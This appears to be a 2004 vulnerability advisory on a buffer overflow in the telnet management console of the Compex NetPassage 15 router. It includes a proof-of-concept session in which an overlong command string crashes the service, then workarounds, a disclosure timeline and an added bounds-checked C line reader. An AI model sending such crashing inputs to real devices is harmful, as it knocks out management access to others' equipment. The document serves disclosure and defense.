by Tan Chew Keong
Release Date: 17 June 2004
Compex NetPassage 15 (NP15) is a 5-Port BroadBand Internet Gateway manufactured by Compex. NP15
allows device management either through a web interface or using telnet. A buffer overflow
condition exists in NP15's telnet management service that may be exploited by an authenticated
user to deny access to the service.
Compex NetPassage 15 Router Manager Console Version: 2.74 Build 1000 Feb 1 2002, 17:45:55
To exploit this vulnerability, the attacker must first log on to the management console using telnet
(port 23). After logon, the attacker can supply an overly long command string as shown below. A
successful exploit will generate an error in the management service, thus disabling further access
to the management service via telnet.
Router Manager Console Version: 2.74 Build 1000 Feb 1 2002, 17:45:55
Please enter your password:********
Welcome !
Command>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa
^ Syntax Error
show set ping delete reset
add enable disable download save
disconnect logout edit
instruction access
Exception next instruction address: 0x61616160
Machine Status Register: 0x08209032
Condition Register: 0x22200040
Task: 0x3012a8 "tTelnetSession0"
- Set strong passwords for console management.
- Ensure that only trusted users have access to console management.
- Do not allow remote management via telnet on the WAN interface.
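
The workarounds above limit who can reach the console; the fault itself is a buffer overflow triggered by an overly long command string. As an added illustration (not Compex firmware code; CMD_MAX, cmd_reader and the function names are hypothetical, and the sample input is constructed), a console line reader that rejects an overlong command instead of writing past its buffer:

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX 128  /* assumed limit; the NP15's real buffer size is not known */
enum cmd_event { CMD_PENDING, CMD_READY, CMD_TOO_LONG };

struct cmd_reader {          /* hypothetical per-session state */
    char   buf[CMD_MAX];
    size_t len;
    int    overflow;         /* current line already exceeded CMD_MAX - 1 bytes */
};

void cmd_reader_init(struct cmd_reader *r) { memset(r, 0, sizeof *r); }

/* Feed one byte received from the session; buf is valid only on CMD_READY. */
enum cmd_event cmd_reader_feed(struct cmd_reader *r, unsigned char c)
{
    if (c == '\r') return CMD_PENDING;          /* telnet sends CR LF; ignore CR */
    if (c == '\n') {
        int too_long = r->overflow;
        r->buf[too_long ? 0 : r->len] = '\0';   /* never pass on a truncated command */
        r->len = 0;
        r->overflow = 0;
        return too_long ? CMD_TOO_LONG : CMD_READY;
    }
    if (r->len + 1 < CMD_MAX)
        r->buf[r->len++] = (char)c;             /* room left for the terminator */
    else
        r->overflow = 1;                        /* drain the rest, store nothing */
    return CMD_PENDING;
}

/* Feed a whole string; returns the event produced by its last byte. */
enum cmd_event cmd_reader_feed_str(struct cmd_reader *r, const char *s)
{
    enum cmd_event ev = CMD_PENDING;
    for (; *s; s++)
        ev = cmd_reader_feed(r, (unsigned char)*s);
    return ev;
}

int main(void)
{
    struct cmd_reader r;
    char line[346];                             /* constructed: 344 'a' bytes + newline */
    memset(line, 'a', 344); line[344] = '\n'; line[345] = '\0';
    cmd_reader_init(&r);
    printf("long line: %d\n", cmd_reader_feed_str(&r, line));      /* CMD_TOO_LONG */
    printf("show:      %d\n", cmd_reader_feed_str(&r, "show\r\n")); /* CMD_READY */
    return 0;
}
```

The session stays usable after the rejected line because the reader drains the excess bytes up to the newline and resets its state.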
01 Jun 04 - Vulnerability Discovered
03 Jun 04 - Initial Vendor Notification (no reply)
17 Jun 04 - Public Release
For further questions and enquiries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg